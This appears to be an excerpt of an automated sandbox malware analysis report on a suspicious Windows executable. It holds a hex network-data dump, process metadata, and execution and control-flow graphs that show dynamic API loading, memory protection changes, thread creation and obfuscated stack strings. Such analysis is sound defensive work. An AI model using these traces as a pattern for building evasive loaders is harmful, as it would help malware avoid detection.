                                    2025-01-12 03:06:08 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'



                                    Target ID:0
                                    Start time:22:04:03
                                    Start date:11/01/2025
                                    Path:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\1387457-38765948.15.exe"
                                    Imagebase:0x140000000
                                    File size:30'954'656 bytes
                                    MD5 hash:947CD5DF10D540B879C037C1CB519E63
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false


                                      Execution Graph

                                      Execution Coverage:6.9%
                                      Dynamic/Decrypted Code Coverage:32.8%
                                      Signature Coverage:16%
                                      Total number of Nodes:1611
                                      Total number of Limit Nodes:16
                                      execution_graph 6329 1f9b9d 6338 1f9afd 6329->6338 6332 1f9afd LoadLibraryA 6333 1f9d27 6332->6333 6334 1f9afd LoadLibraryA 6333->6334 6335 1f9d3e 6334->6335 6336 1f9dd3 6335->6336 6342 1f9e2d 6335->6342 6339 1f9b27 6338->6339 6340 1f9b81 6339->6340 6341 1f9b65 LoadLibraryA 6339->6341 6340->6332 6341->6340 6343 1f9afd LoadLibraryA 6342->6343 6344 1f9ec5 6343->6344 6345 1f9afd LoadLibraryA 6344->6345 6346 1f9f15 6345->6346 6347 1f9afd LoadLibraryA 6346->6347 6348 1f9f90 CreateThread CreateThread 6347->6348 6349 1fa00a 6348->6349 6350 1f9ded 6348->6350 6349->6336 6351 1f9dff 6350->6351 8209 14000b964 GetCommandLineA GetCommandLineW 6749 1400101e5 6752 14000d198 LeaveCriticalSection 6749->6752 8014 1400012ec 8015 1400012f7 8014->8015 8016 140003a96 VirtualAlloc 8015->8016 8017 1400035ab 8016->8017 6753 1400079ed 6765 140007917 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6753->6765 6754 140007a14 6770 1400065c4 6754->6770 6757 140007a4f 6776 14000994c 6757->6776 6759 1400065c4 _CallSETranslator 45 API calls 6760 140007a24 6759->6760 6761 140007a31 __FrameHandler3::GetHandlerSearchState 6760->6761 6762 14000994c __InternalCxxFrameHandler 36 API calls 6760->6762 6763 140007a5a 6762->6763 6764 140006244 45 API calls __InternalCxxFrameHandler 6764->6765 6765->6754 6765->6757 6765->6764 6767 14000626c 6765->6767 6768 1400065c4 _CallSETranslator 45 API calls 6767->6768 6769 14000627a 6768->6769 6769->6765 6781 1400065e0 6770->6781 6773 1400065d2 6773->6759 6773->6760 6777 140009ef8 pre_c_initialization 36 API calls 6776->6777 6778 140009957 6777->6778 6779 1400099d4 abort 36 API calls 6778->6779 6780 140009972 6779->6780 6782 1400065cd 6781->6782 6783 1400065ff GetLastError 6781->6783 6782->6773 6793 1400099d4 6782->6793 6802 140007f64 6783->6802 6815 14000be44 6793->6815 6806 140007cfc 6802->6806 6807 140007d5d TlsGetValue 6806->6807 6812 140007d58 try_get_function 6806->6812 6808 140007e40 6808->6807 6811 140007e4e 
GetProcAddress 6808->6811 6809 140007d8c LoadLibraryExW 6810 140007dad GetLastError 6809->6810 6809->6812 6810->6812 6811->6807 6812->6807 6812->6808 6812->6809 6813 140007e25 FreeLibrary 6812->6813 6814 140007de7 LoadLibraryExW 6812->6814 6813->6812 6814->6812 6849 14000bdfc 6815->6849 6854 14000a1d4 EnterCriticalSection 6849->6854 8210 140004770 DeleteCriticalSection 8211 14000478c __std_exception_destroy 8210->8211 8212 140006370 8214 1400063a0 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 8212->8214 8213 140006491 8214->8213 8215 14000645c RtlUnwindEx 8214->8215 8215->8214 7415 140005c73 7416 14000994c __InternalCxxFrameHandler 36 API calls 7415->7416 7417 140005c78 7416->7417 8216 140004d74 8223 14000510c SetUnhandledExceptionFilter 8216->8223 6354 5ab6cc 6355 5ab6e2 6354->6355 6367 5ad895 6355->6367 6358 5ab682 6359 5ae155 6358->6359 6371 5abc65 6359->6371 6362 5abc65 LoadLibraryA 6363 5ae241 6362->6363 6364 5abc65 LoadLibraryA 6363->6364 6365 5ae2bc CreateThread CreateThread 6364->6365 6366 5ae336 6365->6366 6375 5ae115 6365->6375 6366->6358 6368 5abc65 LoadLibraryA 6367->6368 6369 5ad936 GetSystemInfo 6368->6369 6370 5ad951 6369->6370 6370->6358 6372 5abc8f 6371->6372 6373 5abce9 6372->6373 6374 5abccd LoadLibraryA 6372->6374 6373->6362 6374->6373 6376 5ae127 6375->6376 8224 140009d78 8225 140009d92 8224->8225 8226 140009d7d 8224->8226 8230 140009d98 8226->8230 8231 140009de2 8230->8231 8232 140009dda 8230->8232 8234 14000a08c __free_lconv_num 15 API calls 8231->8234 8233 14000a08c __free_lconv_num 15 API calls 8232->8233 8233->8231 8235 140009def 8234->8235 8236 14000a08c __free_lconv_num 15 API calls 8235->8236 8237 140009dfc 8236->8237 8238 14000a08c __free_lconv_num 15 API calls 8237->8238 8239 140009e09 8238->8239 8240 14000a08c __free_lconv_num 15 API calls 8239->8240 8241 140009e16 8240->8241 8242 14000a08c __free_lconv_num 15 API calls 8241->8242 8243 140009e23 8242->8243 8244 14000a08c __free_lconv_num 15 API 
calls 8243->8244 8245 140009e30 8244->8245 8246 14000a08c __free_lconv_num 15 API calls 8245->8246 8247 140009e3d 8246->8247 8248 14000a08c __free_lconv_num 15 API calls 8247->8248 8249 140009e4d 8248->8249 8250 14000a08c __free_lconv_num 15 API calls 8249->8250 8251 140009e5d 8250->8251 8256 140009b80 8251->8256 8270 14000a1d4 EnterCriticalSection 8256->8270 6377 5b2445 6378 5b2455 6377->6378 6495 5b0aa5 6378->6495 6380 5b2638 6518 5afa05 6380->6518 6382 5b26b9 6383 5abc65 LoadLibraryA 6382->6383 6384 5b2887 6383->6384 6536 5af485 6384->6536 6386 5b297f 6539 5ac365 6386->6539 6389 5b2a5b 6391 5afa05 LoadLibraryA 6389->6391 6392 5b2a86 6391->6392 6544 5b00e5 6392->6544 6394 5b2aa6 6550 5b0285 6394->6550 6396 5b2b04 6555 5b03b5 6396->6555 6399 5afa05 LoadLibraryA 6400 5b2b58 6399->6400 6401 5b00e5 LoadLibraryA 6400->6401 6402 5b2b78 6401->6402 6403 5b0285 LoadLibraryA 6402->6403 6404 5b2bd6 6403->6404 6564 5b1bf5 6404->6564 6406 5b2c1e 6407 5b03b5 LoadLibraryA 6406->6407 6408 5b2c4d 6407->6408 6409 5afa05 LoadLibraryA 6408->6409 6410 5b2c6a 6409->6410 6411 5b00e5 LoadLibraryA 6410->6411 6412 5b2c8a 6411->6412 6413 5b0285 LoadLibraryA 6412->6413 6414 5b2ce8 6413->6414 6568 5b1cc5 6414->6568 6417 5b03b5 LoadLibraryA 6418 5b2d31 6417->6418 6419 5afa05 LoadLibraryA 6418->6419 6420 5b2d4e 6419->6420 6421 5b00e5 LoadLibraryA 6420->6421 6422 5b2d6e 6421->6422 6423 5b0285 LoadLibraryA 6422->6423 6424 5b2dcc 6423->6424 6425 5b1cc5 LoadLibraryA 6424->6425 6426 5b2de6 6425->6426 6427 5b03b5 LoadLibraryA 6426->6427 6428 5b2e15 6427->6428 6571 5b0925 6428->6571 6431 5b0925 LoadLibraryA 6432 5b2e2f 6431->6432 6433 5b0925 LoadLibraryA 6432->6433 6434 5b2e3c 6433->6434 6435 5b0925 LoadLibraryA 6434->6435 6436 5b2e49 6435->6436 6437 5abc65 LoadLibraryA 6436->6437 6438 5b2f34 6437->6438 6439 5abc65 LoadLibraryA 6438->6439 6440 5b2ff3 6439->6440 6441 5abc65 LoadLibraryA 6440->6441 6442 5b3007 6441->6442 6443 5abc65 LoadLibraryA 6442->6443 6444 5b3039 6443->6444 6576 5b1135 6444->6576 
6446 5b3051 6447 5afa05 LoadLibraryA 6446->6447 6448 5b3163 6447->6448 6449 5b03b5 LoadLibraryA 6448->6449 6452 5b3198 6449->6452 6450 5b36ca 6609 5ab525 6450->6609 6452->6450 6453 5b31c8 6452->6453 6454 5afa05 LoadLibraryA 6453->6454 6455 5b3282 6454->6455 6456 5b00e5 LoadLibraryA 6455->6456 6457 5b32a2 6456->6457 6458 5b0285 LoadLibraryA 6457->6458 6459 5b3300 6458->6459 6460 5abc65 LoadLibraryA 6459->6460 6461 5b3392 6460->6461 6462 5b340d 6461->6462 6466 5b33d4 6461->6466 6463 5af485 LoadLibraryA 6462->6463 6464 5b344e 6463->6464 6644 5b05e5 6464->6644 6631 5acad5 6466->6631 6468 5b05e5 LoadLibraryA 6469 5b347a 6468->6469 6470 5b05e5 LoadLibraryA 6469->6470 6472 5b348f 6470->6472 6473 5b05e5 LoadLibraryA 6472->6473 6484 5b34a4 6473->6484 6474 5b3587 6494 5b3403 6474->6494 6651 5b2145 6474->6651 6477 5b05e5 LoadLibraryA 6478 5b35bd 6477->6478 6479 5b05e5 LoadLibraryA 6478->6479 6480 5b35d1 6479->6480 6481 5b05e5 LoadLibraryA 6480->6481 6483 5b35e6 6481->6483 6482 5b05e5 LoadLibraryA 6482->6484 6485 5b05e5 LoadLibraryA 6483->6485 6484->6474 6484->6482 6486 5b35fb 6485->6486 6487 5b05e5 LoadLibraryA 6486->6487 6488 5b3633 6487->6488 6489 5b05e5 LoadLibraryA 6488->6489 6490 5b3647 6489->6490 6491 5b05e5 LoadLibraryA 6490->6491 6492 5b365c 6491->6492 6493 5b05e5 LoadLibraryA 6492->6493 6493->6494 6496 5abc65 LoadLibraryA 6495->6496 6497 5b0b58 6496->6497 6498 5abc65 LoadLibraryA 6497->6498 6499 5b0beb 6498->6499 6501 5abc65 LoadLibraryA 6499->6501 6503 5b0cb4 6499->6503 6500 5abc65 LoadLibraryA 6502 5b0d3a 6500->6502 6501->6503 6504 5abc65 LoadLibraryA 6502->6504 6503->6500 6505 5b0e45 6504->6505 6506 5abc65 LoadLibraryA 6505->6506 6507 5b0e5e 6506->6507 6508 5abc65 LoadLibraryA 6507->6508 6509 5b0e77 6508->6509 6510 5abc65 LoadLibraryA 6509->6510 6516 5b0f10 6510->6516 6511 5b1011 6512 5abc65 LoadLibraryA 6511->6512 6513 5b10cc 6512->6513 6514 5abc65 LoadLibraryA 6513->6514 6515 5b10e8 6514->6515 6515->6380 6516->6511 6517 5abc65 LoadLibraryA 6516->6517 6517->6511 
6519 5afa1e 6518->6519 6520 5abc65 LoadLibraryA 6519->6520 6521 5afcb2 6520->6521 6522 5abc65 LoadLibraryA 6521->6522 6523 5afcc9 6522->6523 6524 5abc65 LoadLibraryA 6523->6524 6525 5afce3 6524->6525 6526 5abc65 LoadLibraryA 6525->6526 6527 5afcfd 6526->6527 6528 5abc65 LoadLibraryA 6527->6528 6529 5afd17 6528->6529 6530 5abc65 LoadLibraryA 6529->6530 6531 5afe0a 6530->6531 6532 5abc65 LoadLibraryA 6531->6532 6533 5afe23 6532->6533 6534 5abc65 LoadLibraryA 6533->6534 6535 5afe3c 6534->6535 6535->6382 6666 5af3c5 6536->6666 6669 5abe55 6539->6669 6541 5ac3ff 6542 5abe55 LoadLibraryA 6541->6542 6543 5ac40d 6542->6543 6543->6389 6618 5ac445 6543->6618 6545 5b019c 6544->6545 6548 5b0141 6544->6548 6546 5acad5 LoadLibraryA 6545->6546 6547 5b01a1 6546->6547 6549 5abc65 LoadLibraryA 6547->6549 6548->6394 6549->6548 6551 5abc65 LoadLibraryA 6550->6551 6552 5b0326 6551->6552 6553 5abc65 LoadLibraryA 6552->6553 6554 5b033c 6553->6554 6554->6396 6556 5abc65 LoadLibraryA 6555->6556 6557 5b0486 6556->6557 6558 5abc65 LoadLibraryA 6557->6558 6559 5b049f 6558->6559 6560 5abc65 LoadLibraryA 6559->6560 6561 5b04b8 6560->6561 6562 5abc65 LoadLibraryA 6561->6562 6563 5b0529 6562->6563 6563->6399 6565 5b1c18 6564->6565 6567 5b1c1d 6564->6567 6566 5af3c5 LoadLibraryA 6565->6566 6566->6567 6567->6406 6678 5b1c65 6568->6678 6570 5b1cd7 6570->6417 6572 5abc65 LoadLibraryA 6571->6572 6573 5b09e0 6572->6573 6574 5abc65 LoadLibraryA 6573->6574 6575 5b0a53 6574->6575 6575->6431 6577 5abc65 LoadLibraryA 6576->6577 6578 5b11e8 6577->6578 6579 5abc65 LoadLibraryA 6578->6579 6580 5b127b 6579->6580 6581 5b1344 6580->6581 6583 5abc65 LoadLibraryA 6580->6583 6582 5abc65 LoadLibraryA 6581->6582 6584 5b13ca 6582->6584 6583->6581 6585 5abc65 LoadLibraryA 6584->6585 6586 5b14f6 6585->6586 6587 5abc65 LoadLibraryA 6586->6587 6588 5b1512 6587->6588 6589 5abc65 LoadLibraryA 6588->6589 6590 5b152b 6589->6590 6591 5abc65 LoadLibraryA 6590->6591 6592 5b15c4 6591->6592 6598 5abc65 LoadLibraryA 6592->6598 6599 
5b16c5 6592->6599 6593 5abc65 LoadLibraryA 6594 5b179b 6593->6594 6595 5abc65 LoadLibraryA 6594->6595 6596 5b17b7 6595->6596 6597 5af485 LoadLibraryA 6596->6597 6600 5b17d1 6597->6600 6598->6599 6599->6593 6601 5abc65 LoadLibraryA 6600->6601 6602 5b1a30 6601->6602 6603 5abc65 LoadLibraryA 6602->6603 6604 5b1a4a 6603->6604 6605 5abc65 LoadLibraryA 6604->6605 6606 5b1a64 6605->6606 6607 5abc65 LoadLibraryA 6606->6607 6608 5b1a7e 6607->6608 6608->6446 6610 5abc65 LoadLibraryA 6609->6610 6611 5ab5f2 6610->6611 6681 5b4045 6611->6681 6615 5ab614 6616 5abc65 LoadLibraryA 6615->6616 6617 5ab65f 6616->6617 6617->6494 6619 5abe55 LoadLibraryA 6618->6619 6620 5ac5cd 6619->6620 6621 5abe55 LoadLibraryA 6620->6621 6622 5ac5db 6621->6622 6623 5abe55 LoadLibraryA 6622->6623 6624 5ac5ec 6623->6624 6625 5abe55 LoadLibraryA 6624->6625 6626 5ac5fa 6625->6626 6627 5abe55 LoadLibraryA 6626->6627 6628 5ac60b 6627->6628 6629 5abe55 LoadLibraryA 6628->6629 6630 5ac61c 6629->6630 6630->6389 6710 5ac7b5 6631->6710 6634 5abc65 LoadLibraryA 6635 5acb82 6634->6635 6636 5abc65 LoadLibraryA 6635->6636 6637 5acc01 6636->6637 6638 5abc65 LoadLibraryA 6637->6638 6639 5acca4 6638->6639 6640 5abc65 LoadLibraryA 6639->6640 6641 5accf7 6640->6641 6642 5abc65 LoadLibraryA 6641->6642 6643 5acdb1 6642->6643 6643->6494 6645 5abc65 LoadLibraryA 6644->6645 6646 5b064d 6645->6646 6647 5abc65 LoadLibraryA 6646->6647 6648 5b0698 6647->6648 6649 5abc65 LoadLibraryA 6648->6649 6650 5b0715 6649->6650 6650->6468 6652 5ac365 LoadLibraryA 6651->6652 6653 5b2151 6652->6653 6654 5b21f5 6653->6654 6655 5abc65 LoadLibraryA 6653->6655 6656 5abc65 LoadLibraryA 6654->6656 6660 5b223d 6654->6660 6655->6654 6657 5b2299 6656->6657 6658 5abc65 LoadLibraryA 6657->6658 6659 5b22d0 6658->6659 6659->6660 6661 5abc65 LoadLibraryA 6659->6661 6660->6477 6662 5b2368 6661->6662 6663 5abc65 LoadLibraryA 6662->6663 6664 5b2409 6663->6664 6719 5b1e95 6664->6719 6667 5abc65 LoadLibraryA 6666->6667 6668 5af452 6667->6668 6668->6386 6670 
5abc65 LoadLibraryA 6669->6670 6671 5ac006 6670->6671 6672 5abc65 LoadLibraryA 6671->6672 6677 5ac02f 6671->6677 6673 5ac052 6672->6673 6674 5abc65 LoadLibraryA 6673->6674 6675 5ac069 6674->6675 6676 5abc65 LoadLibraryA 6675->6676 6676->6677 6677->6541 6679 5af3c5 LoadLibraryA 6678->6679 6680 5b1c6e 6679->6680 6680->6570 6690 5b3985 6681->6690 6683 5b404e 6695 5b3ea5 6683->6695 6686 5abc65 LoadLibraryA 6687 5b40f3 6686->6687 6703 5b3bc5 6687->6703 6689 5ab5ff SleepEx 6689->6615 6691 5abc65 LoadLibraryA 6690->6691 6692 5b3a6d 6691->6692 6693 5abc65 LoadLibraryA 6692->6693 6694 5b3ae3 6693->6694 6694->6683 6696 5abc65 LoadLibraryA 6695->6696 6697 5b3fba 6696->6697 6698 5b3fc7 6697->6698 6699 5abc65 LoadLibraryA 6697->6699 6698->6686 6700 5b3fe2 VirtualProtect 6699->6700 6708 5af695 6700->6708 6704 5abc65 LoadLibraryA 6703->6704 6705 5b3ca7 6704->6705 6706 5abc65 LoadLibraryA 6705->6706 6707 5b3cd9 6705->6707 6706->6707 6707->6689 6709 5af6bc VirtualProtect 6708->6709 6709->6698 6711 5abc65 LoadLibraryA 6710->6711 6712 5ac88f 6711->6712 6713 5abc65 LoadLibraryA 6712->6713 6714 5ac9dc 6713->6714 6715 5abc65 LoadLibraryA 6714->6715 6716 5ac9f6 6715->6716 6717 5abc65 LoadLibraryA 6716->6717 6718 5aca49 6717->6718 6718->6634 6718->6643 6720 5abc65 LoadLibraryA 6719->6720 6721 5b1f89 6720->6721 6722 5abc65 LoadLibraryA 6721->6722 6723 5b1fa0 6722->6723 6724 5abc65 LoadLibraryA 6723->6724 6727 5b203f 6724->6727 6725 5b207f 6725->6660 6727->6725 6728 5b1cf5 6727->6728 6729 5abc65 LoadLibraryA 6728->6729 6730 5b1d50 6729->6730 6731 5abc65 LoadLibraryA 6730->6731 6732 5b1d66 6731->6732 6733 5abc65 LoadLibraryA 6732->6733 6734 5b1d7c 6733->6734 6735 5abc65 LoadLibraryA 6734->6735 6736 5b1d92 6735->6736 6736->6727 6988 140004000 6991 1400046c8 6988->6991 6992 1400046e3 __scrt_get_show_window_mode 6991->6992 6993 140004729 GetLastError 6992->6993 6994 140004010 6992->6994 6993->6994 6995 140004741 IsDebuggerPresent 6993->6995 6995->6994 6996 14000474b OutputDebugStringW 
6995->6996 6996->6994 6997 140003400 6998 140003427 6997->6998 7001 140003a96 VirtualAlloc 6998->7001 7002 1400035ab 7001->7002 7003 1f0000 7004 1f0009 7003->7004 7005 1f9afd LoadLibraryA 7004->7005 7006 1f9402 7005->7006 7021 1fa37d 7006->7021 7011 1f9afd LoadLibraryA 7012 1f9645 7011->7012 7013 1f9afd LoadLibraryA 7012->7013 7014 1f965c 7013->7014 7015 1f9afd LoadLibraryA 7014->7015 7016 1f9673 7015->7016 7017 1f9afd LoadLibraryA 7016->7017 7019 1f9749 7017->7019 7018 1f979b 7019->7018 7043 1f938d 7019->7043 7060 1fa05d 7021->7060 7024 1f9afd LoadLibraryA 7025 1fa42a 7024->7025 7026 1f9afd LoadLibraryA 7025->7026 7027 1fa4a9 7026->7027 7028 1f9afd LoadLibraryA 7027->7028 7029 1fa54c 7028->7029 7030 1f9afd LoadLibraryA 7029->7030 7031 1fa59f 7030->7031 7032 1f9afd LoadLibraryA 7031->7032 7033 1f940f 7032->7033 7034 1f9b9d 7033->7034 7035 1f9afd LoadLibraryA 7034->7035 7036 1f9d10 7035->7036 7037 1f9afd LoadLibraryA 7036->7037 7038 1f9d27 7037->7038 7039 1f9afd LoadLibraryA 7038->7039 7040 1f9d3e 7039->7040 7041 1f941a 7040->7041 7042 1f9e2d 3 API calls 7040->7042 7041->7011 7042->7041 7044 1f9afd LoadLibraryA 7043->7044 7045 1f9402 7044->7045 7046 1fa37d LoadLibraryA 7045->7046 7047 1f940f 7046->7047 7048 1f9b9d 3 API calls 7047->7048 7049 1f941a 7048->7049 7050 1f9afd LoadLibraryA 7049->7050 7051 1f9645 7050->7051 7052 1f9afd LoadLibraryA 7051->7052 7053 1f965c 7052->7053 7054 1f9afd LoadLibraryA 7053->7054 7055 1f9673 7054->7055 7056 1f9afd LoadLibraryA 7055->7056 7057 1f9749 7056->7057 7058 1f979b 7057->7058 7059 1f938d 3 API calls 7057->7059 7058->7018 7059->7058 7061 1f9afd LoadLibraryA 7060->7061 7062 1fa137 7061->7062 7063 1f9afd LoadLibraryA 7062->7063 7064 1fa284 7063->7064 7065 1f9afd LoadLibraryA 7064->7065 7066 1fa29e 7065->7066 7067 1f9afd LoadLibraryA 7066->7067 7068 1fa2f1 7067->7068 7068->7024 7068->7033 8018 5ae745 8019 5abc65 LoadLibraryA 8018->8019 8020 5aeb3c 8019->8020 8021 5abc65 LoadLibraryA 8020->8021 8022 5aeb56 8021->8022 8023 5abc65 
LoadLibraryA 8022->8023 8024 5aeb70 8023->8024 8025 5abc65 LoadLibraryA 8024->8025 8026 5aeb8a 8025->8026 8027 5abc65 LoadLibraryA 8026->8027 8028 5aeba1 8027->8028 8029 5abc65 LoadLibraryA 8028->8029 8030 5aebb8 8029->8030 8031 5abc65 LoadLibraryA 8030->8031 8032 5aec3a 8031->8032 8033 140004f04 8036 1400052e4 8033->8036 8037 140005307 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8036->8037 8038 14000537b 8036->8038 8037->8038 7069 14000ae08 7070 14000ae30 7069->7070 7078 14000ae29 7069->7078 7071 14000ae37 7070->7071 7072 14000ae69 7070->7072 7073 14000a888 pre_c_initialization 15 API calls 7071->7073 7072->7078 7080 14000856c 7072->7080 7075 14000ae42 7073->7075 7077 14000a08c __free_lconv_num 15 API calls 7075->7077 7076 14000ae94 7079 14000a08c __free_lconv_num 15 API calls 7076->7079 7077->7078 7079->7078 7081 140008574 7080->7081 7082 1400085b3 7081->7082 7083 1400085a4 7081->7083 7084 1400085bd 7082->7084 7089 14000a0cc 7082->7089 7085 140008544 _set_fmode 15 API calls 7083->7085 7096 14000a108 7084->7096 7088 1400085a9 __scrt_get_show_window_mode 7085->7088 7088->7076 7090 14000a0d5 7089->7090 7091 14000a0ee HeapSize 7089->7091 7092 140008544 _set_fmode 15 API calls 7090->7092 7093 14000a0da 7092->7093 7094 140008424 _invalid_parameter_noinfo 32 API calls 7093->7094 7095 14000a0e5 7094->7095 7095->7084 7097 14000a127 7096->7097 7098 14000a11d 7096->7098 7100 14000a12c 7097->7100 7103 14000a133 pre_c_initialization 7097->7103 7108 14000a244 7098->7108 7101 14000a08c __free_lconv_num 15 API calls 7100->7101 7105 14000a125 7101->7105 7102 14000a172 7104 140008544 _set_fmode 15 API calls 7102->7104 7103->7102 7106 14000a15c HeapReAlloc 7103->7106 7107 140008614 pre_c_initialization 2 API calls 7103->7107 7104->7105 7105->7088 7106->7103 7106->7105 7107->7103 7109 14000a28f 7108->7109 7113 14000a253 pre_c_initialization 7108->7113 7110 140008544 _set_fmode 15 API calls 7109->7110 7112 14000a28d 7110->7112 7111 14000a276 
HeapAlloc 7111->7112 7111->7113 7112->7105 7113->7109 7113->7111 7114 140008614 pre_c_initialization 2 API calls 7113->7114 7114->7113 7115 14000f60c 7116 14000f621 CloseHandle 7115->7116 7117 14000f627 7115->7117 7116->7117 7425 14000ba8c GetProcessHeap 8272 14000a18c 8273 14000a194 8272->8273 8274 14000a5b4 6 API calls 8273->8274 8275 14000a1c5 8273->8275 8277 14000a1c1 8273->8277 8274->8273 8278 14000a1f0 8275->8278 8279 14000a21b 8278->8279 8280 14000a1fe DeleteCriticalSection 8279->8280 8281 14000a21f 8279->8281 8280->8279 8281->8277 8282 14000ff8e 8283 1400065c4 _CallSETranslator 45 API calls 8282->8283 8284 14000ffa5 8283->8284 8285 1400065c4 _CallSETranslator 45 API calls 8284->8285 8286 14000ffbc 8285->8286 8287 140007398 __InternalCxxFrameHandler 51 API calls 8286->8287 8288 140010001 8287->8288 8289 1400065c4 _CallSETranslator 45 API calls 8288->8289 8290 140010006 8289->8290 7118 14000d010 7119 14000d03a 7118->7119 7120 14000a888 pre_c_initialization 15 API calls 7119->7120 7121 14000d059 7120->7121 7122 14000a08c __free_lconv_num 15 API calls 7121->7122 7123 14000d067 7122->7123 7124 14000a888 pre_c_initialization 15 API calls 7123->7124 7127 14000d091 7123->7127 7126 14000d083 7124->7126 7128 14000a08c __free_lconv_num 15 API calls 7126->7128 7129 14000d09a 7127->7129 7130 14000a5b4 7127->7130 7128->7127 7131 14000a2a4 __vcrt_uninitialize_ptd 5 API calls 7130->7131 7132 14000a5ef 7131->7132 7133 14000a60c InitializeCriticalSectionAndSpinCount 7132->7133 7134 14000a5f7 7132->7134 7133->7134 7134->7127 8039 5ad175 8044 5ace95 8039->8044 8041 5ad18c 8042 5abc65 LoadLibraryA 8041->8042 8043 5ad24e 8041->8043 8042->8043 8045 5abe55 LoadLibraryA 8044->8045 8046 5ad0c1 8045->8046 8047 5abe55 LoadLibraryA 8046->8047 8048 5ad0d2 8047->8048 8049 5abe55 LoadLibraryA 8048->8049 8050 5ad0e3 8049->8050 8051 5abe55 LoadLibraryA 8050->8051 8052 5ad0f4 8051->8052 8053 5abe55 LoadLibraryA 8052->8053 8054 5ad105 8053->8054 8054->8041 8291 5aedf5 8292 5abc65 LoadLibraryA 

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • GetSystemInfo.KERNELBASE ref: 005AD940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: InfoLibraryLoadSystem
                                      • String ID: .$2$3$G$I$S$d$e$e$e$e$f$k$l$l$l$m$n$n$o$r$s$t$t$y
                                      • API String ID: 2528439753-3724200337
                                      • Opcode ID: d85b8bba056b28d2799e73070786ba9d67a4272c9851de9a1785cf0b177bbb99
                                      • Instruction ID: 593d3f6a05ceb624d47e8793ba80d147c9de408304e22044190e7317cd0caf72
                                      • Opcode Fuzzy Hash: d85b8bba056b28d2799e73070786ba9d67a4272c9851de9a1785cf0b177bbb99
                                      • Instruction Fuzzy Hash: EC21942040C7C0D9E3529628C08875FBEE26BA6748F88599DB1C95A292C7BF8658C767

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • CreateThread.KERNELBASE(?,?,?,?,005AB6B9), ref: 005AE2E7
                                      • CreateThread.KERNELBASE ref: 005AE316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CreateThread$LibraryLoad
                                      • String ID: .$2$3$C$C$F$H$O$S$T$W$a$a$a$a$b$c$d$d$d$e$e$e$e$e$e$e$e$e$g$h$i$i$j$k$l$l$l$l$l$l$n$n$n$o$o$r$r$r$r$s$t$t$t
                                      • API String ID: 2788165007-893793269
                                      • Opcode ID: e91c4b7461437b13ac5e400fcfbaf4a77185ab935cdbb9ea016077ae64e05c00
                                      • Instruction ID: a9c2ae705baef2082f40e111d919b68f9ec4366bbd21f72320f8f3b8a1625fce
                                      • Opcode Fuzzy Hash: e91c4b7461437b13ac5e400fcfbaf4a77185ab935cdbb9ea016077ae64e05c00
                                      • Instruction Fuzzy Hash: DB61873010C7C4CEE366D728C45875FBFD2ABA2708F58495DA1D98A292CBFB8558C763

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 001F9AFD: LoadLibraryA.KERNELBASE ref: 001F9B6A
                                      • CreateThread.KERNELBASE ref: 001F9FBB
                                      • CreateThread.KERNELBASE ref: 001F9FEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287901093.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1f0000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CreateThread$LibraryLoad
                                      • String ID: .$2$3$C$C$F$H$O$S$T$W$a$a$a$a$b$c$d$d$d$e$e$e$e$e$e$e$e$e$g$h$i$i$j$k$l$l$l$l$l$l$n$n$n$o$o$r$r$r$r$s$t$t$t
                                      • API String ID: 2788165007-893793269
                                      • Opcode ID: 8a5b82fe3d15e2b9049db49ce0ba258f13ec4bbdf6a4570f9736429d93e05b29
                                      • Instruction ID: 291817e796b9960acf98a799380addfb22d72d2452b00d03e3d2f6eea33324ca
